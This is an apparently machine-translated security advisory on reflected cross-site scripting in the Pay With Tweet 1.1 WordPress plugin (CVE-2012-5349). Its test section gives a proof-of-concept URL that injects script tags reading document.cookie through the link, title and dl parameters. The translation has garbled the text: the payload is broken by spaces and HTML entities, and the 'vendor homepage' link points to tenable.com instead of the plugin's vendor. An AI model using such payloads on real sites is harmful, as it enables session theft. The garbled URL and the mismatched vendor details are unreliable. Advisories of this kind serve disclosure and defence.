Release date:
Updated on:
Affected Systems:
WordPress Pay With Tweet 1.1
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51308
Cve id: CVE-2012-5349
Pay With Tweet plugin for WordPress is a social media marketing system.
Multiple XSS vulnerabilities exist in Pay. php plug-ins of pay With Tweet 1.1 and other versions. The link, title, and dl parameters allow remote attackers to inject arbitrary Web scripts or HTML.
<* Source: Gianluca Brindisi
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/wp-content/plugins/pay-with-tweet.php/pay.php? Link = % 22 & gt; & lt;/input & gt; & lt; script & gt; alert (document. cookie) & lt;/script & gt; & amp; title = & lt; script & gt; alert (document. cookie) & lt;/script & gt; & dl = http://brindi.si % 27 & quot; & gt; & lt; script & gt; alert (document. cookie) & lt;/script & gt;
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WordPress
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tenable.com/